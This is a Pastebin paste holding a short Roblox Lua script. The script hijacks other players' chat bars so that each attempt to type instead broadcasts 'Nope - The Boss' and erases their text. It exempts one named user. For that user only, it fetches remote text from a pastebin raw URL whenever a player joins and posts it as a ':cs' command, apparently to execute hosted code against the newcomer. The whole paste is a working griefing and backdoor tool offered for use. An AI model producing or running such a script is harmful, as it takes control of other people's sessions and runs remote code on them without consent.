DrawingJhon

Untitled

Jul 25th, 2020 (edited)
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.07 KB | None | 0 0
  1. if game.Players.LocalPlayer:findFirstChild("Increpted") then
  2.   return
  3. else
  4.   local d = Instance.new("StringValue", game.Players.LocalPlayer)
  5.   d.Name = "Increpted"
  6. end
  7.  
  8. local scamMsg = "Nope - The Boss"
  9. local chatBar = game.Players.LocalPlayer:findFirstChildOfClass("PlayerGui").Chat.Frame.ChatBarParentFrame.Frame.BoxFrame.Frame.ChatBar
  10.  
  11. local db = false
  12. chatBar.Focused:Connect(function()
  13.    if game.Players.LocalPlayer.Name == "JhonXD2006" then return end
  14.    if db then return end
  15.    db = true
  16.    chatBar:CaptureFocus()
  17.    game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(scamMsg, "All")
  18.    wait(0.1)
  19.    chatBar:ReleaseFocus()
  20.    chatBar.Text = ""
  21.    db = false
  22. end)
  23.  
  24. game:GetService("Players").PlayerAdded:Connect(function(plr)
  25.    if game.Players.LocalPlayer.Name == "JhonXD2006" then
  26.       local asdf = require(game.Players.LocalPlayer.PlayerScripts.ChatScript.ChatMain)
  27.       asdf.MessagePosted:fire(":cs "..plr.Name.." "..game:GetService("HttpService"):GetAsync("https://pastebin.com/raw/csE9q88i"));
  28.    end
  29. end)
Add Comment
Please, Sign In to add comment